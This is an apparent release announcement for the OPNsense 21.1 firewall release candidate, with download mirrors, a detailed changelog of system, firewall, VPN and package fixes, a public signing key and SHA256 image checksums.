<p>Hi there,</p><p>For more than 6 years, OPNsense has been driving innovation through modularising and hardening the open source firewall, with simple and reliable firmware upgrades, multi-language support, HardenedBSD security, fast adoption of upstream software updates as well as clear and stable 2-Clause BSD licensing.</p><p>We thank all of you for helping test, shape and contribute to the project! We know it would not be the same without you. &lt;3</p><p>Download links, an installation guide[<a target="_blank" href="https://docs.opnsense.org/manual/install.html">1</a>] and the checksums for the images can be found below as well.</p><p><ul><li>Europe: <a target="_blank" href="https://opnsense.c0urier.net/releases/21.1/">https://opnsense.c0urier.net/releases/21.1/</a></li><li>US East Coast: <a target="_blank" href="http://mirrors.nycbug.org/pub/opnsense/releases/21.1/">http://mirrors.nycbug.org/pub/opnsense/releases/21.1/</a></li><li>US West Coast: <a target="_blank" href="https://mirror.sfo12.us.leaseweb.net/opnsense/releases/21.1/">https://mirror.sfo12.us.leaseweb.net/opnsense/releases/21.1/</a></li><li>South America: <a target="_blank" href="https://mirror.venturasystems.tech/opnsense/releases/21.1/">https://mirror.venturasystems.tech/opnsense/releases/21.1/</a></li><li>Australia: <a target="_blank" href="http://mirror.as24220.net/opnsense/releases/21.1/">http://mirror.as24220.net/opnsense/releases/21.1/</a></li><li>Full mirror list: <a target="_blank" href="https://opnsense.org/download/">https://opnsense.org/download/</a></li></ul></p><p>Here are the full patch notes against 20.7.7_1:</p><p><ul><li>system: use authentication factory for web GUI login</li><li>system: allow case-insensitive matching for LDAP user authentication</li><li>system: removed unused gateway API dashboard feed</li><li>system: removed spurious comma from certificate subject print and unified underlying code</li><li>system: harden web GUI defaults to TLS 1.2 minimum and strong
ciphers</li><li>system: generate a better self-signed certificate for web GUI default</li><li>system: allow self-signed renew for web GUI default (using "configctl webgui restart renew")</li><li>system: allow subdirectories in NextCloud backup (contributed by Lorenzo Milesi)</li><li>system: optionally allow TOTP users to regenerate a token from the password page</li><li>system: set default certificate lifetime to 397 days</li><li>system: relax gateway name validation</li><li>system: display destination port number in firewall log widget (contributed by Team Rebellion)</li><li>system: allow to recover from bad TLS certificate and/or bad settings in console interface assign</li><li>interfaces: defer IPv6 disable in interface code to ensure PPP interfaces do exist</li><li>interfaces: no longer assume configuration-less interfaces can reach static setup code</li><li>interfaces: fix PPP links not linking to linked advanced configuration</li><li>firewall: add live log "host", "port" and "not" filters</li><li>firewall: add manual refresh button to live log</li><li>firewall: create an appropriate max-mss scrub rule for IPv6</li><li>firewall: fix anti-spoof option for separate bridge interfaces</li><li>firewall: relax schedule name validation</li><li>firewall: fix typo in ICMPv6 validation</li><li>firewall: add type 128 to outgoing IPv6 RFC4890 requirements</li><li>firewall: fix minor regression in maintaining target alias file</li><li>firewall: category selector missing caption</li><li>firewall: fix all state value in pfTop (contributed by Lucas Held)</li><li>firewall: remove duplicated destination field in live log</li><li>firewall: add read-only actions to aliases permission (contributed by Manuel Faux)</li><li>reporting: add top talkers to revamped traffic graphs page</li><li>dhcp: hostname validation now includes domain</li><li>dhcp: correct DHCPv6 custom options unsigned integer field (contributed by Team Rebellion)</li><li>dhcp: removed the need for a static IPv4 
being outside of the pool (contributed by Gauss23)</li><li>dhcp: add min-secs option for each subnet (contributed by vnxme)</li><li>dhcp: fix sorting of IPv6 static mappings (contributed by vnxme)</li><li>dnsmasq: remove advanced configuration in favour of plugin directory</li><li>dnsmasq: use domain override for static hosts</li><li>firmware: opnsense-code now updates the current directory if nothing was specified</li><li>firmware: opnsense-code now uses flexible make.conf target from tools.git</li><li>firmware: opnsense-update now supports snapshot access via -z option</li><li>firmware: opnsense-update now fixes missing dependencies on the fly</li><li>firmware: repair display of removed packages during release type transition</li><li>firmware: fix some issues with missing repository on server</li><li>firmware: add version output and date to audit logs</li><li>intrusion detection: replace file-based policy changes with detailed filters</li><li>ipsec: NAT with multiple phase 2 (sponsored by m.a.x. 
it)</li><li>ipsec: prevent VTI interface to hit spurious 32768 limit</li><li>ipsec: allow mixed IPv4/IPv6 for VTI</li><li>ipsec: display remote host in status overview (contributed by garlic17)</li><li>openssh: honour MAX_LISTEN_SOCKS to prevent startup failure</li><li>openvpn: added toggle for block-outside-dns (contributed by Julio Camargo)</li><li>openvpn: hide "openvpn_add_dhcpopts" fields when not parsed via the backend</li><li>openvpn: set default certificate lifetime to 397 days in wizard</li><li>unbound: default to SO_REUSEPORT</li><li>web proxy: add GSuite and YouTube filtering (contributed by Julio Camargo)</li><li>web proxy: lock ACL download to prevent duplicate execution</li><li>mvc: make sure isArraySequential() is only true on array input</li><li>mvc: speed up processing time when over 2000 users are selected in a group</li><li>mvc: allow underscore in filter string (contributed by kulikov-a)</li><li>images: use UFS2 as the default for nano, serial and vga</li><li>images: support UEFI boot in serial image</li><li>ui: add tooltips for service control widget</li><li>ui: move sidebar stage from session to local storage</li><li>plugins: os-bind 1.15[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.1/dns/bind/pkg-descr">2</a>]</li><li>plugins: os-frr 1.21[<a target="_blank" href="https://github.com/opnsense/plugins/blob/stable/21.1/net/frr/pkg-descr">3</a>]</li><li>src: fix OpenSSL NULL pointer de-reference[<a target="_blank" href="https://www.freebsd.org/security/advisories/FreeBSD-SA-20:33.openssl.asc">4</a>]</li><li>src: fix AES-CCM requests with an AAD size smaller than a single block</li><li>src: introduce HARDEN_KLD to ensure DTrace functionality</li><li>src: fix partial scrub of multicast packages</li><li>src: refine pf_route* behaviour in PF_DUPTO case for shared forwarding</li><li>src: assorted upstream fixes for ipfw, iflib, multicast processing and pf</li><li>ports: libressl 3.2.3[<a target="_blank" 
href="https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.2.2-relnotes.txt">5</a>][<a target="_blank" href="https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.2.3-relnotes.txt">6</a>]</li><li>ports: nss 3.60.1</li><li>ports: pkg fix for shell keyword by opening root file descriptor</li><li>ports: radvd 2.19[<a target="_blank" href="https://radvd.litech.org/">7</a>]</li><li>ports: sudo 1.9.4p2[<a target="_blank" href="https://www.sudo.ws/stable.html#1.9.4p2">8</a>]</li></ul></p><p>Known issues and limitations:</p><p><ul><li>Installer currently advertises 20.7</li></ul></p><p>The public key for the 21.1 series is:</p><p><pre>-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAtiv4C8TPBnVAxUS+xW3W
uYhAOuLCZPA6F22Qatit4PVHI7AzfLbGjCQFZqjO+HRPVCmeiyggQWE4ZBOQrhbq
Em/NqmnDVos2rdGfEvp5miY4fstebtHI9CPv26QswgO7bsoJuCUoSmtGTbgNXyaF
ueNYTSXNEpWu35tQS830NCLW5Y6elfK99gxmNChlGdlz0wchaSA+myR6xH+TUw8L
D+87Tny/R2guC9Q0XnsKpKeOMxkNh0X3H0GsmcWmyV0rGAiMh6GuJXIN/yhNMkaD
wuHomqxd1OAyGLz9BjDNRKZ+b+y0iVpEx3qsDWlradtf8sUKZHJ96lf0jCRhEPvl
v1+QkAOzsauWBr3UtFbkKfHONpuwb5XVNgAJzFIRrnGhmWRXD7liiShOP4O+KBP1
Dzxs/X0plXgX2hOgzMbtgCMj4M1sV5HhKUrwiyqBpoe5nESJVrQ/DxETwEZIFoHy
hwQxd/DDp7uJmZlCkveuZeUAo7pfTUVchDpe2GB54bHEhIn3OES93PURMQtQxB12
mubV52vcfvzLnbv5FL5lMK/cgl64ip2bRu1jcB3wsKrKcGyUbtYJQDnHpowWrs5h
RdMHSfLyaC8ROMKhZmJTe141wr5p8d+NmgjlDblnNmUJ0jHVJeP0+RO/OcY/o3Zt
2MxL1Yp2cUu2l1HEmyrCsIcCAwEAAQ==
-----END PUBLIC KEY-----</pre></p><p>Please let us know about your experience!</p><p><br>Stay safe,<br> Your OPNsense team</p><p><pre>SHA256 (OPNsense-21.1.r1-OpenSSL-dvd-amd64.iso.bz2) = c6cfdd88227bb58c94634dca01e9108647a83278a4549291a4b772094342c81a
SHA256 (OPNsense-21.1.r1-OpenSSL-nano-amd64.img.bz2) = a60c3cb077b56202d3b02637054607f6180121b7da9faaf870f73a814dcfc2c7
SHA256 (OPNsense-21.1.r1-OpenSSL-serial-amd64.img.bz2) = cba8578d7acbb323fd1fa6fe93d648c5d227010e1169ccbdf1111980d73fa447
SHA256 (OPNsense-21.1.r1-OpenSSL-vga-amd64.img.bz2) = 1fce48c99e5c46d92fca7a00805873154832357c7de71f5035a01ca8047041dc</pre></p>